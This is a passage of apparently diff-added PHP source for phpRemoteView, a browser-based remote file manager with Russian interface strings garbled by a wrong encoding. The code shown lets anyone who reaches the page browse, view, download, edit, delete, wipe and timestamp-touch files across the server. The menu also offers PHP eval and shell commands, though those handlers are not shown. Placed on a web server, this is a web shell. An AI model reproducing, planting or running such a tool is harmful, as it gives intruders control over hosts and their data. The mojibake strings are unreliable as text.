1 - َلûâà‏ùèé) + $cc[2] - ïîêàçûâàٍü ëè èêîيêè + $cc[3] - ÷ٍî نهëàٍü ïًè êëèêه ïî èêîيêه ôàéëà: + 0 - ïًîٌىîًٍ â text/plain + 1 - ïًîٌىîًٍ â html + 2 - download + 3 - ïàًàىهًٍû ôàéëà (info) + $cc[4] - îêًَمëےٍü ًàçىهً ôàéëîâ نî تل/جل/أل + $cc[5] - ےçûê: + 1 - àيمëèéٌêèé + 2 - ًٌٌَêè + +$cn / $cp[1] - ٌïèٌîê êîëîيîê è èُ ïîًےنîê, êîٍîًûه ïîêàçûâàٍü, ًٌٍîêà لَêâ/ِèôً: + t - type + n - name + s - size + a - owner+group + o - owner + g - group + c - chmod + 1 - create time + 2 - modify time + 3 - access time + +$cp[2]: ôîًىàٍ âًهىهيè + +$cp[3]: èىے ًّèôٍà + +$cp[4]: ًàçىهً ًّèôٍà + +*/ + + // تàê âûًàâيèâàٍü êîëîيêè + $cn_align=array(); + $cn_align['t']='center'; + $cn_align['n']='left'; + $cn_align['s']='right'; + $cn_align['a']='center'; + $cn_align['o']='center'; + $cn_align['g']='center'; + $cn_align['c']='center'; + $cn_align['1']='center'; + $cn_align['2']='center'; + $cn_align['3']='center'; + + +/////////////////////////////////////////////////////////////////////////////// + + +/*--mmstart--*/ +$mm=array( +"Index of"=>"بينهêٌ", +"View file"=>"دîêàç ôàéëà", +"DISK"=>"ؤبرت", +"Info"=>"بيôî", +"Plain"=>"دًےىîé", +"HTML"=>"HTML", +"Session"=>"رهٌٌèے", +"Image"=>"تàًٍèيêà", +"Notepad"=>"ءëîêيîٍ", +"DOWNLOAD"=>"اہأذسابزـ", +"Edit"=>"دًàâêà", +"Sorry, this programm run in read-only mode."=>"بçâèيèٍه, ‎ٍà ïًîمًàىىà ًàلîٍàهٍ â ًهوèىه 'ٍîëüêî ÷ٍهيèه'.", +"For full access: write"=>"ؤëے ïîëيîمî نîٌٍَïà: يàïèّèٍه", +"in this php-file"=>"â ‎ٍîى php-ôàéëه", +"Reason"=>"دًè÷èيà", +"Error path"=>"خّèلî÷يûé ïٍَü", +"Click here for start"=>"حàوىèٍه نëے ٌٍàًٍà", +"up directory"=>"êàٍàëîم âûّه", +"access denied"=>"نîٌٍَï çàïًهùهي", +"REMVIEW TOOLS"=>"سزبثبزغ REMVIEW", +"version"=>"âهًٌèے", +"Free download"=>"ءهٌïëàٍيàے çàمًَçêà", +"back to directory"=>"âهًيٍَüٌے â êàٍàëîم", +"Size"=>"ذàçىهً", +"Owner"=>"خâيهً", +"Group"=>"أًَïïà", +"FileType"=>"زèï ôàéëà", +"Perms"=>"دًàâà", +"Create time"=>"آًهىے ٌîçنàيèے", +"Access time"=>"آًهىے نîٌٍَïà", +"MODIFY time"=>"آًهىے باجإحإحبك", 
+"HEXDUMP PREVIEW"=>"دذإؤدذخرجخزذ آ 16-ذب×حخج آبؤإ", +"ONLY READ ACCESS"=>"ؤخرزسد زخثـتخ حہ ×زإحبإ", +"Can't READ file - access denied"=>"حه ىîمَ ïًî÷èٍàٍü - نîٌٍَï çàïًهùهي", +"full read/write access"=>"ïîëيûé نîٌٍَï يà ÷ٍهيèه/çàïèٌü", +"FILE SYSTEM COMMANDS"=>"تخجہحؤغ شہةثخآخة ربرزإجغ", +"EDIT"=>"ذإؤہتز.", +"FILE"=>"شہةث", +"DELETE"=>"رزإذإزـ", +"Delete this file"=>"رٍهًهٍü ôàéë", +"CLEAN"=>"خ×برزبزـ", +"TOUCH"=>"خءحخآبزـ", +"Set current 'mtime'"=>"سٌٍàي.ٍهêَù.âًهىے", +"WIPE(delete)"=>"سحب×زخئبزـ", +"Write '0000..' and delete"=>"اàلèٍü يَëےىè, ٌٍهًهٍü", +"COPY FILE"=>"تخدبذخآہزـ شہةث", +"COPY"=>"تخدبذخآہزـ", +"MAKE DIR"=>"رخاؤہزـ تہزہثخأ", +"type full path"=>"ââهنèٍه ïîëيûé ïٍَü", +"MkDir"=>"رîçن.تàٍ.", +"CREATE NEW FILE or override old file"=>"رخاؤہزـ حخآغة شہةث èëè ïهًهçàïèٌàٍü ٌٍàًûé", +"CREATE/OVERRIDE"=>"رخاؤہزـ/دإذإاہدبرہزـ", +"select file on your local computer"=>"âûلًàٍü ôàéë يà âàّهى ëîêàëüيîى êîىïü‏ٍهًه", +"save this file on path"=>"ٌîًُàيèٍü ‎ٍîٍ ôàéë â êàٍàëîم", +"create file name automatic"=>"ïًèنَىàٍü èىے ôàéëَ àâٍîىàٍè÷هٌêè", +"OR"=>"بثب", +"type any file name"=>"ââهٌٍè èىے ôàéëà âًَ÷يَ‏", +"convert file name to lovercase"=>"êîيâهًٍèًîâàٍü èىے â يèويèé ًهمèًٌٍ", +"Send File"=>"دîٌëàٍü ôàéë", +"Delete all files in dir"=>"سنàëèٍü âٌه ôàéëû", +"Delete all dir/files recursive"=>"سنàëèٍü آرإ +ïîنêàٍàëîمè ًهêًٌَèâيî", +"Confirm not found (go back and set checkbox)"=>"دîنٍâهًونهيèه يه ïîٌٍàâëهيî (âهًيèٍهٌü يàçàن è ïîٌٍàâüٍه مàëî÷êَ)", +"Delete cancel - File not found"=>"سنàëهيèه îٍىهيهيî - شàéë يه يàéنهي", +"YES"=>"ؤہ", +"ME"=>"جإحك", +"NO (back)"=>"حإز (يàçàن)", +"Delete cancel"=>"سنàëهيèه îٍىهيهيî", +"ACCESS DENIED"=>"ؤخرزسد اہدذإظإح", +"done (go back)"=>"مîٍîâî (يàçàن)", +"Delete ok"=>"خê, َنàëهييî", +"Touch cancel"=>"خليîâëهيèه îٍىهيهيî", +"Touch ok (set current time to 'modify time')"=>"خليîâëهيèه çàâهًّهيî (ôàéëَ ïًèٌâîهيî ٍهêَùهه âًهىے ىîنèôèêàِèè)", +"Clean (empty file) cancel"=>"خ÷èùهيèه (îليَëهيèه ôàéëà) îٍىهيهيî", +"Clean ok (file now 
empty)"=>"خê, î÷èùهيî (ôàéë îليَëهي)", +"Wipe cancel - access denied"=>"سيè÷ٍîوهيèه îٍىهيهيî - نîٌٍَï çàïًهùهي", +"Wipe ok (file deleted)"=>"خê, َيè÷ٍîوهيî (è ôàéë ٌٍهًٍ)", +"DIR"=>"DIR", +"Deleting all files in"=>"سنàëهيèه âٌهُ ôàéëîâ â", +"skip"=>"ïًîïٌَê", +"deleting"=>"َنàëهيèه", +"Deleting all dir/files (recursive) in"=>"سنàëهيèه âٌهُ ôàéëîâ/ïîنêàٍàëîمîâ (ًهêًٌَèâيî)", +"DONE, go back"=>"أخزخآخ, يàçàن", +"DONE"=>"أخزخآخ", +"file not found"=>"ôàéë يه يàéنهي", +"ONLY READ ACCESS (don't edit!)"=>"ؤخرزسد زخثـتخ حہ ×زإحبإ (يه ًهنàêٍèًîâàٍü)", +"Can't READ file - access denied (don't edit!)"=>"حه ىîمَ ×بزہزـ ôàéë - نîٌٍَï çàïًهùهي", +"EDIT FILE"=>"دذہآبزـ شہةث", +"can't open, access denied"=>"يه ىîمَ îٍêًûٍü, نîٌٍَï çàïًهùهي", +"SAVE FILE (write to disk)"=>"رخصذہحبزـ شہةث (çàïèٌü يà نèٌê)", +"You mast checked 'create file name automatic' OR typed file name!"=>"آû نîëويû îٍىهٍèٍü مàëî÷êَ [ٌîçنàٍü ôàéë àâٍîىàٍè÷هٌêè] èëè ââهٌٍè â ïîëه èىے ôàéëà!'", +"SAVING TO"=>"رخصذہحبزـ آ", +"Sorry, access denied"=>"بçâèيèٍه, نîٌٍَï çàïًهùهي", +"for example, uncomment next line"=>"نëے ïًèىهًà, ًàٌêîىىهيٍèًَéٍه ٌëهنَ‏ùَ‏ ًٌٍîêَ", +"Eval PHP code"=>"آûïîëيèٍü PHP êîن", +"don't type"=>"يه ïèّèٍه", +"and"=>"è", +"example (remove comments '#')"=>"ïًèىهً (َنàëèٍه êîىىهيٍàًèè '#')", +"Shell commands"=>"تîىàينû Shell'a", +"filesize to 0byte"=>"ًàçىهً â 0 لàéٍ", +"from"=>"îٍ", +"to"=>"â", +"Full file name"=>"دîëيîه èىے ôàéëà", +"Can't open directory"=>"حه ىîمَ îٍêًûٍü êàٍàëîم", +"setup"=>"يàًٌٍîéêà", +"back"=>"يàçàن", +"Reset all settings"=>"رلًîٌèٍü âٌه يàًٌٍîéêè", +"clear"=>"î÷èٌٍèٍü", +"Current"=>"زهêَùèه", +"Colums and sort"=>"تîëîيêè è ٌîًٍèًîâêà", +"Sort order"=>"دîًےنîê ٌîًٍèًîâêè", +"Ascending sort"=>"دî âîçًàٌٍàيè‏", +"Descending sort"=>"دî َلûâàيè‏", +"Sort by filename"=>"رîًٍèًîâàٍü ïî èىهيè ôàéëà", +"Sort by filename extension"=>"رîًٍèًîâàٍü ïî ًàٌّèًهيè‏ ôàéëà", +"Date/time format"=>"شîًىàٍ نàٍû/âًهىهيè", +"Panel font & size"=>"طًèôٍ/ًàçىهً ïàيهëè", +"Setup"=>"خïِèè", +"Char 
map"=>"رèىâîëû", +"Language"=>"كçûê", +"English"=>"ہيمëèéٌêèé", +"Russian"=>"ذٌٌَêèé", +"Character map (symbol codes table)"=>"زàلëèِà ٌèىâîëîâ", +"Select font"=>"آûلهًèٍه ًّèôٍ", +"or type other"=>"èëè ââهنèٍه نًَمîé", +"Font size"=>"ذàçىهً ًّèôٍà", +"Code limit"=>"ؤèïàçîي êîنîâ", +"Generate table"=>"رمهيهًèًîâàٍü ٍàلëèَِ", +"Universal convert"=>"سيèâهًٌàëüيûه êîيâهًٍàِèè" +);/*--mmstop--*/ + + + + + $language=$cc[5]; + if ($language!=1 && $language!=2) $language=1; + + +function mm($m) { + global $mm,$language; + if ($language==1) return $m; + if (isset($mm[$m])) return $mm[$m]; + else echo "<script>alert('(mm) msg not found: $m');</script>"; +} + + +switch ($language) { +case 1: +$cn_name=array( +'t'=>"Type", +'n'=>"Name", +'s'=>"Size", +'o'=>"Owner", +'g'=>"Group", +'a'=>"Owner/Group", +'c'=>"Perms", +'1'=>"Create", +'2'=>"Modify", +'3'=>"Access" +); +break; +case 2: +$cn_name=array( +'t'=>"زèï", +'n'=>"بىے", +'s'=>"ذàçىهً", +'o'=>"آëàنهëهِ", +'g'=>"أًَïïà", +'a'=>"آëàنهëهِ/أًَïïà", +'c'=>"دًàâà", +'1'=>"رîçنàي", +'2'=>"بçىهيهي", +'3'=>"ؤîٌٍَï" +); +break; +} + + + + +/////////////////////////////////////////////////////////////////////////////// + + + + $rand=microtime(); + + if (!isset($c)) $c=""; + if (!isset($d)) $d=""; + if (!isset($f)) $f=""; + + ob(); + $d=str_replace("\\","/",$d); + if ($d=="") $d=realpath("./")."/"; + if ($c=="") $c="l"; + if ($d[strlen($d)-1]!="/") $d.="/"; + $d=str_replace("\\","/",$d); + if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." 
<tt><font color=red><big>$d</big></font></tt>$obb"); + if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb"); + obb(); + + // + // OS detect: + // + $win=0; + $unix=0; + if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1; + + + + +/////////////////////////////////////////////////////////////////////////////// + + +$html=<<<remview +<html><head> +<title>phpRemoteView: $d$f</title> +</head> +<body> +<style> +A { +text-decoration : none; +} +.t { +font-size: 9pt; +text-align : center; +font-family: Verdana; +} +.t2 { +font-size: 8pt; +text-align : center; +font-family: Verdana; +} +.n { + font-family: Fixedsys +} +.s { +font-size: 10pt; +text-align : right; +font-family: Verdana; +} +.sy { +font-family: Fixedsys; +} +.s2 { +font-family: Fixedsys; +color: red; +} +.tab { +font-size: 10pt; +text-align : center; +font-family: Verdana; +background: #cccccc; +} +.tr { +background: #ffffff; +} +</style> +remview; + + + +function display_perms($mode) +{ +if ($GLOBALS['win']) return 0; +/* Determine Type */ +if( $mode & 0x1000 ) +$type='p'; /* FIFO pipe */ +else if( $mode & 0x2000 ) +$type='c'; /* Character special */ +else if( $mode & 0x4000 ) +$type='d'; /* Directory */ +else if( $mode & 0x6000 ) +$type='b'; /* Block special */ +else if( $mode & 0x8000 ) +$type='-'; /* Regular */ +else if( $mode & 0xA000 ) +$type='l'; /* Symbolic Link */ +else if( $mode & 0xC000 ) +$type='s'; /* Socket */ +else +$type='u'; /* UNKNOWN */ + +/* Determine permissions */ +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 
'x' : '-'; + +/* Adjust for SUID, SGID and sticky bit */ +if( $mode & 0x800 ) +$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) +$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) +$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; + +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + +function _posix_getpwuid($x) { + if ($GLOBALS['win']) return array(); + return @posix_getpwuid($x); +} + +function _posix_getgrgid($x) { + if ($GLOBALS['win']) return array(); + return @posix_getgrgid($x); +} + +function up($d,$f="",$name="") { + global $self,$win; + + $len=strlen($d."/".$f); + if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; } + elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";} + else {$sf1="<font size=2>"; $sf2="<font size=3>";} + + echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td + bgcolor=#cccccc> $sf1"; + + $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>"; + echo $home.$sf2."<b>"; + if ($name!="") echo $name; + else { + if ($f=="") echo mm("Index of"); + else echo mm("View file"); + } + echo "</b></font> "; + + $path=explode("/",$d); + + $rootdir="/"; + if ($win) $rootdir=strtoupper(substr($d,0,2))."/"; + + $ss=""; + for ($i=0; $i<count($path)-1; $i++) { + if ($i==0) + $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; + else + $comm="$path[$i]<big><b>/</big></b>"; + + $ss.=$path[$i]."/"; + echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>"; + if ($i==0 && $d=="/") break; + } + echo "</font>"; + if ($f!="") echo "$sf1$f</font>"; + + if ($win && strlen($d)<4 && $f=="") { + echo " &nbsp; ".mm("DISK").": "; + for ($i=ord('a'); $i<=ord('z'); $i++) { + echo "<a 
href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> "; + } + } + + echo "</b></big></td><td bgcolor=#999999 width=1% align=center> + <table width=100% border=0 cellspacing=3 cellpadding=0 + bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a + href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b> + </nobr></font></td></tr></table> + </td></tr></table>"; +} + + +function up_link($d,$f) { + global $self; + $notepad=str_replace(".","_",$f).".txt"; +echo "<small> +[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>] +[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>] +[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>] +[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>] +[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>] +</small>"; +} + + +function exitw() { +exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd> +<tr><td align=center> +".mm("Sorry, this programm run in read-only mode.")."<br> +".mm("For full access: write")." 
`<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` +".mm("in this php-file").".</td></tr></table> +"); +} + + + +function ob() { + global $obb_flag, $obb; + if (!isset($obb_flag)) { $obb_flag=0; $obb=false; } + if (function_exists("ob_start")) { + if ($GLOBALS['obb_flag']) ob_end_clean(); + ob_start(); + $GLOBALS['obb_flag']=1; + } +} + +function obb() { + global $obb; + if (function_exists("ob_start")) { + $obb=ob_get_contents(); + ob_end_clean(); + $obb="<P> +<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td> +<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center> +<b>".mm("Reason").":</b></td></tr></table> +</td></tr><tr><td> +<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td> +$obb<P> +</td></tr></table> +</table><P>"; + $GLOBALS['obb_flag']=0; + } +} + +function sizeparse($size) { + return strrev(preg_replace("!...!","\\0 ",strrev($size))); +} + + +function jsval($msg) { + $msg=str_replace("\\","\\\\",$msg); + $msg=str_replace("\"","\\\"",$msg); + $msg=str_replace("'","\\'",$msg); + return '"'.$msg.'",'; +} + + + +/////////////////////////////////////////////////////////////////////////// + + +switch($c) { + + +// listing +case "l": + + echo $GLOBALS['html']; + + if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>."); + + //up($d); + + ob(); + $di=dir($d); + obb(); + + $dirs=array(); + $files=array(); + + if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")). + "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>". + "<font color=red><b>".mm("access denied")."</b></font>: $obb"); + while (false!==($name=$di->read())) { + if ($name=="." 
|| $name=="..") continue; + if (@is_dir($d.$name)) { + $dirs[]=strval($name); + $fstatus[$name]=0; + } + else { + $files[]=strval($name); + $fstatus[$name]=1; + } + $fsize[$name]=@filesize($d.$name); + $ftype[$name]=@filetype($d.$name); + if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; } + $fperms[$name]=@fileperms($d.$name); + $fmtime[$name]=@filemtime($d.$name); + $fatime[$name]=@fileatime($d.$name); + $fctime[$name]=@filectime($d.$name); + $fowner[$name]=@fileowner($d.$name); + $fgroup[$name]=@filegroup($d.$name); + if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) + $fext[$name]=strtolower($ok[1]); + else + $fext[$name]=""; + } + $di->close(); + + $listsort=array(); + if (count($dirs)) + foreach ($dirs as $v) { + switch ($cc[0]) { + case "e": $listsort[$v]=$fext[$v].' '.$v; break; + case "n": $listsort[$v]=strtolower($v); break; + default: + switch ($cn[$cc[0]]) { + case "t": case "s": case "n": $listsort[$v]=strtolower($v); break; + case "o": $listsort[$v]=$fowner[$v]; break; + case "g": $listsort[$v]=$fgroup[$v]; break; + case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break; + case "c": $listsort[$v]=$fperms[$v]; break; + case "1": $listsort[$v]=$fctime[$v]; break; + case "2": $listsort[$v]=$fmtime[$v]; break; + case "3": $listsort[$v]=$fatime[$v]; break; + + } + } + } + + $names=$listsort; + //echo "<pre>";print_r($names); + if ($cc[1]) arsort($names); else asort($names); + //echo "<pre>";print_r($names); + + $listsort=array(); + if (count($files)) + foreach ($files as $v) { + $v=strval($v); + switch ($cc[0]) { + case "e": $listsort[$v]=$fext[$v].' 
'.$v; break; + case "n": $listsort[$v]=strtolower($v); break; + default: + switch ($cn[$cc[0]]) { + case "n": $listsort[$v]=strtolower($v); break; + case "t": $listsort[$v]=$ftype[$v]; break; + case "s": $listsort[$v]=$fsize[$v]; break; + case "o": $listsort[$v]=$fowner[$v]; break; + case "g": $listsort[$v]=$fgroup[$v]; break; + case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break; + case "c": $listsort[$v]=$fperms[$v]; break; + case "1": $listsort[$v]=$fctime[$v]; break; + case "2": $listsort[$v]=$fmtime[$v]; break; + case "3": $listsort[$v]=$fatime[$v]; break; + + } + } + } + + + //echo "<pre>DIRS:"; print_r($names); + if ($cc[1]) arsort($listsort); else asort($listsort); + //$names=array_merge($names,$listsort); + foreach ($listsort as $k=>$v) $names[$k]=$v; + //echo "<pre>FILES:"; print_r($listsort); + //echo "<pre>NAMES:"; print_r($names); + +?> +<STYLE> +.title { +color: 'black'; +background: #D4D0C8; +text-align: 'center'; +BORDER-RIGHT: #888888 1px outset; +BORDER-TOP: #ffffff 2px outset; +BORDER-LEFT: #ffffff 1px outset; +BORDER-BOTTOM: #888888 1px outset; +} +.window { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; +BACKGROUND-COLOR: #D4D0C8; +CURSOR: default; +} +.window1 { +BORDER-RIGHT: #eeeeee 1px solid; +BORDER-TOP: #808080 1px solid; +BORDER-LEFT: #808080 1px solid; +BORDER-BOTTOM: #eeeeee 1px solid; +FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; +} +.line { +BORDER-RIGHT: #cccccc 1px solid; +BORDER-TOP: #ffffff 1px solid; +BORDER-LEFT: #ffffff 1px solid; +BORDER-BOTTOM: #cccccc 1px solid; +font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>; +} +.line2 { +background: #ffffcc; +} +.black {color: black} +a:link.black {color: black} +a:active.black {color: black} +a:visited.black {color: black} +a:hover.black {color: #0000ff} + +.white {color: 
white} +a:link.white{color: white} +a:active.white{color: white} +a:visited.white{color: white} +a:hover.white{color: #ffff77} + +a:link {color: #000099;} +a:active {color: #000099;} +a:visited {color: #990099;} +a:hover {color: #ff0000;} +a { +CURSOR: default; +} +.windowtitle { +font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; +font-weight: bold; +color: white; +} +.sym { +font: 14px Wingdings; +} +</STYLE> + +<?php + +function up2($d) { + global $win,$self; + $d=str_replace("\\","/",$d); + if (substr($d,-1)!="/") $d.="/"; + $d=str_replace("//","/",$d); + + $n=explode("/",$d); + unset($n[count($n)-1]); + + $path=""; + for ($i=0; $i<count($n); $i++) { + $path="$path$n[$i]/"; + if ($i==0) $path=strtoupper($path); + $paths[]=$path; + } + + $out=""; + $sum=0; + $gr=70; + for ($i=0; $i<count($n); $i++) { + $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>"; + if (strlen($d)>$gr && $i>0 && $i+1<count($n)) { + if (strlen($d)-$sum>$gr) { + $out.="••"; + $sum+=strlen($n[$i]); + } + else + $out.=$n[$i]; + } + else + if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i]; + $out.="/</a>"; + + } + + return $out; + return "<font size=-2>$d</font>"; +} + +$ext=array(); +$ext['html']=array('html','htm','shtml'); +$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg'); +$ext['exe']=array('exe','com','pif','src','lnk'); +$ext['php']=array('php','phtml','php3','php4','inc'); +$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg'); + + + echo "\n\n\n<script>\nfunction tr("; + for ($i=0; $i<strlen($cn); $i++) { + echo "a$i,"; + } + echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee"; +// echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>"; + echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>"; + for ($i=0; $i<strlen($cn); $i++) { + echo '<td 
align='.$cn_align[$cn[$i]].' class=line '; + switch ($cn[$i]) { + case 's': case 'c': case '1': case '2': case '3': case 't': + echo ' nowrap'; + } + echo ">"; + if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0"; + echo "\"+a$i+\""; + if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0"; + echo "</td>"; + } + echo "</tr>\");\n}"; + echo "\n\n</script>\n\n\n"; + + + //phpinfo(); + //echo implode(" | ",$cp); + echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc + class=window align=center width=60%><form name=main>'; + + echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'. + $self.'?c=img&name=fon&r=" class=windowtitle>'; + + echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'. + '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'. + up2($d.$f).'</td></tr></table>'; + + echo '</td></tr>'. + '<tr><td>'. + '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>'; + + $button_help=array( + 'up'=>"UP DIR", + 'refresh'=>"RELOAD", + 'mode'=>'SETUP, folder option', + 'edit'=>'DIR INFO', + 'home'=>'HomePage', + 'papki'=>'TREE', + 'setup'=>'PHP eval, Shell', + 'back'=>'BACK', + ); + + function button_url($name) { + global $self,$d,$f,$uurl; + switch ($name) { + case 'up': return "$self?c=l&d=".urlencode(realpath($d."..")); + case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d); + case 'mode': return "$self?c=setup&ref=$uurl"; + case 'edit': return "$self?c=d&d=".urlencode($d); + case 'home': return "http://php.spb.ru/remview/"; + case 'papki': return "$self?c=tree&d=".urlencode($d); + case 'setup': return "$self?c=t"; + case 'back': return "javascript:history.back(-1)"; + } + } + echo '<td colspan='.strlen($cn).'> + <table border=0 cellspacing=0 cellpadding=2><tr>'; + $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home'); + $tmp=strtoupper($d[0]); + for ($i=0; $i<count($buttons); $i++) { + if ($buttons[$i]=='full') { + echo '<td 
class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" + style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>'; + continue; + } + if ($buttons[$i]=='disk') { + if (!$win) continue; + echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '. + ' onMouseOut="this.style.backgroundColor=\'\'">'; + echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 ' + onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>"; + for ($j=ord('A'); $j<=ord('Z'); $j++) + echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j); + echo "</select></td>"; + continue; + } + $bturl=button_url($buttons[$i]); + echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'. + ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'. + ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'. + ' onClick=\'location.href="'.$bturl.'"\'><a href='; + echo button_url($buttons[$i]); + echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>'; + } + echo '</tr></table> + </td></tr><tr>'; + + + for ($i=0; $i<strlen($cn); $i++) { + echo "<td nowrap class=title onClick='location.href=\"". 
+ "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'"; + switch ($cn[$i]) { + case 1: case 2: case 3: case "s": echo " width=13%"; break; + case 't': echo " width=2%"; break; + case 'n': echo " width=40%"; break; + } + echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>"; + switch ($cn[$i]) { + case "n": case "t": case "s": case "o": case "g": + case "a": case "c": case "1": case "2": case "3": + echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break; + default: + echo "??$cn[$i]??"; + } + if ($cc[0]==="$i") { + if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>"; + else echo "<img src=$self?c=img&name=sort_desc border=0>"; + } + echo '</a></td>'; + } + echo '</tr>'; + + echo "\n\n<script>\n\n"; + foreach ($names as $k=>$v) { + + echo "\n\n// $k \n"; + echo 'tr('; + + for ($i=0; $i<strlen($cn); $i++) { + + switch ($cn[$i]) { + + case 'n': + switch($ftype[$k]) { + case 'file': + $vv=strtolower(substr($k,strlen($k)-4,4)); + $add=""; + if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp" + || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1"; + if (substr($k,0,5)=="sess_") $add="&ftype=4"; + $ln='<a href='.$self.'?&c=v&d='.urlencode($d). + '&f='.urlencode($k).$add.'>'; + break; + + default: + $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>'; + break; + } + + if ($ftype[$k]=='dir') + $ln.='<img src='.$self.'?c=img&name=dir border=0>'; + else { + 